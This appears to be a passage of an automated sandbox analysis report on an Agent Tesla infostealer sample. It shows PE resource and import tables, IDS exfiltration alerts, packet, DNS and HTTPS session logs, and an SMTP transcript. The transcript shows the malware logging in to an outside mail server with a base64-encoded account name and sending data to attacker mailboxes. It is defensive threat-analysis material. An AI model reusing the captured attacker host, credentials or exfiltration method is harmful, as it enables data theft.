.rsrc | 0x4b000 | 0xd30 | 0xe00 | e46d56b3a01f6ccd2462e77a7b696dee | False | 0.42578125 | data | 4.247954142797999 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x4b208 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894 |
RT_DIALOG | 0x4b4f0 | 0x120 | data | English | United States | 0.5138888888888888 |
RT_DIALOG | 0x4b610 | 0xf8 | data | English | United States | 0.6330645161290323 |
RT_DIALOG | 0x4b708 | 0xa0 | data | English | United States | 0.6125 |
RT_DIALOG | 0x4b7a8 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x4b808 | 0x14 | data | English | United States | 1.2 |
RT_VERSION | 0x4b820 | 0x1d0 | data | English | United States | 0.5474137931034483 |
RT_MANIFEST | 0x4b9f0 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153 |
DLL | Import |
---|---|
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
03/18/24-14:31:09.862635 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
03/18/24-14:31:09.862635 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
03/18/24-14:31:09.862635 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
03/18/24-14:31:09.862549 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 18, 2024 14:30:57.266913891 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.266952038 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.267021894 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.278402090 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.278417110 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.596740007 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.596909046 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.693818092 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.693835974 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.694147110 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.694210052 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.698870897 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.740240097 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.900914907 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.900943041 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.901031971 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.901047945 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.901094913 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.058695078 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.058746099 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.058835030 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.058850050 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.058887959 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.058914900 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.141953945 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.142085075 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.212632895 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.212717056 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.213152885 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.213226080 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.213779926 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.213843107 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.214209080 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.214273930 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.370575905 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.370660067 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.402682066 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402739048 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402772903 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402786970 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.402795076 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402808905 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402839899 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.402848959 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402913094 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402941942 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.402949095 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.403023958 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.403033972 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.403059959 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.403064966 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.403112888 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.403162003 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.673203945 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.673279047 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.673325062 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.673461914 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.673484087 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.673531055 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.675894976 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.675976992 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676064014 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676111937 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676130056 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676134109 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676155090 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676166058 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676196098 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676199913 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676208973 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676249981 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676274061 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676318884 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676335096 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676338911 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676359892 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676368952 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676386118 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676393986 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676424026 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676450014 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676481009 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676851034 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676862955 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:59.257819891 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.257862091 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.257941961 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.261018991 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.261032104 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.451380968 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.451467991 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.453665972 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.453674078 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.453906059 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.457915068 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.504237890 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.721412897 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.721471071 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.721544981 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.726278067 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:31:04.246793032 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:05.257479906 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:05.487135887 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:05.487293005 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:05.876562119 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:05.876825094 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:06.106491089 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:06.107126951 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:06.337042093 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:06.337366104 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:06.585319996 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:06.585750103 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:06.815315008 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:06.815548897 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.064551115 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.064724922 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.294112921 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.294204950 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.294970036 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295172930 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295257092 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295336962 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295394897 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295444012 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295506954 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.524666071 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.524687052 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.524698973 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.546400070 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.601195097 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.645462990 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.915066004 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.076515913 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.076646090 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.076700926 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.078820944 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.297899961 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.298130989 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.306317091 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.522958994 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.523412943 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.742866039 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.743076086 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.962687969 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.966187000 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.194453001 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.194699049 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.413757086 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.413950920 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.642729998 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.642939091 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862123966 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.862199068 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.862469912 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862549067 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862634897 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862687111 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862756014 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862816095 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862864017 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862905025 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862941027 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862977982 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:10.082042933 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.082087040 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.082098007 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.082110882 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.118055105 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.163692951 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 18, 2024 14:30:57.144936085 CET | 49740 | 53 | 192.168.2.11 | 1.1.1.1 |
Mar 18, 2024 14:30:57.253304005 CET | 53 | 49740 | 1.1.1.1 | 192.168.2.11 |
Mar 18, 2024 14:30:59.160237074 CET | 57213 | 53 | 192.168.2.11 | 1.1.1.1 |
Mar 18, 2024 14:30:59.250303030 CET | 53 | 57213 | 1.1.1.1 | 192.168.2.11 |
Mar 18, 2024 14:31:03.335611105 CET | 49912 | 53 | 192.168.2.11 | 1.1.1.1 |
Mar 18, 2024 14:31:04.243828058 CET | 53 | 49912 | 1.1.1.1 | 192.168.2.11 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Mar 18, 2024 14:30:57.144936085 CET | 192.168.2.11 | 1.1.1.1 | 0x2932 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 18, 2024 14:30:59.160237074 CET | 192.168.2.11 | 1.1.1.1 | 0x100c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 18, 2024 14:31:03.335611105 CET | 192.168.2.11 | 1.1.1.1 | 0xd7c8 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Mar 18, 2024 14:30:57.253304005 CET | 1.1.1.1 | 192.168.2.11 | 0x2932 | No error (0) | 104.128.228.214 | A (IP address) | IN (0x0001) | false | ||
Mar 18, 2024 14:30:59.250303030 CET | 1.1.1.1 | 192.168.2.11 | 0x100c | No error (0) | 104.26.13.205 | A (IP address) | IN (0x0001) | false | ||
Mar 18, 2024 14:30:59.250303030 CET | 1.1.1.1 | 192.168.2.11 | 0x100c | No error (0) | 104.26.12.205 | A (IP address) | IN (0x0001) | false | ||
Mar 18, 2024 14:30:59.250303030 CET | 1.1.1.1 | 192.168.2.11 | 0x100c | No error (0) | 172.67.74.152 | A (IP address) | IN (0x0001) | false | ||
Mar 18, 2024 14:31:04.243828058 CET | 1.1.1.1 | 192.168.2.11 | 0xd7c8 | No error (0) | scootero.cl | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 18, 2024 14:31:04.243828058 CET | 1.1.1.1 | 192.168.2.11 | 0xd7c8 | No error (0) | 177.221.140.242 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.11 | 49715 | 104.128.228.214 | 443 | 7712 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-03-18 13:30:57 UTC | 186 | OUT | |
2024-03-18 13:30:57 UTC | 223 | IN | |
2024-03-18 13:30:57 UTC | 7969 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.11 | 49716 | 104.26.13.205 | 443 | 7712 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-03-18 13:30:59 UTC | 155 | OUT | |
2024-03-18 13:30:59 UTC | 211 | IN | |
2024-03-18 13:30:59 UTC | 14 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Mar 18, 2024 14:31:05.876562119 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 220-cloud242.americahost.cl ESMTP Exim 4.96.2 #2 Mon, 18 Mar 2024 10:31:05 -0300 220- We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. |
Mar 18, 2024 14:31:05.876825094 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | EHLO 035347 |
Mar 18, 2024 14:31:06.106491089 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 250-cloud242.americahost.cl Hello 035347 [191.96.227.194] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP |
Mar 18, 2024 14:31:06.107126951 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | AUTH login c2VuZGluZzAxQHNjb290ZXJvLmNs |
Mar 18, 2024 14:31:06.337042093 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 334 UGFzc3dvcmQ6 |
Mar 18, 2024 14:31:06.585319996 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 235 Authentication succeeded |
Mar 18, 2024 14:31:06.585750103 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | MAIL FROM:<sending01@scootero.cl> |
Mar 18, 2024 14:31:06.815315008 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 250 OK |
Mar 18, 2024 14:31:06.815548897 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | RCPT TO:<receiving01@scootero.cl> |
Mar 18, 2024 14:31:07.064551115 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 250 Accepted |
Mar 18, 2024 14:31:07.064724922 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | DATA |
Mar 18, 2024 14:31:07.294204950 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 354 Enter message, ending with "." on a line by itself |
Mar 18, 2024 14:31:07.295506954 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | . |
Mar 18, 2024 14:31:07.546400070 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 250 OK id=1rmD51-00EmIk-2i |
Mar 18, 2024 14:31:07.645462990 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | QUIT |
Mar 18, 2024 14:31:08.076515913 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 221 cloud242.americahost.cl closing connection |
Mar 18, 2024 14:31:08.522958994 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 | 220-cloud242.americahost.cl ESMTP Exim 4.96.2 #2 Mon, 18 Mar 2024 10:31:08 -0300 220- We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. |
Mar 18, 2024 14:31:08.523412943 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 | EHLO 035347 |
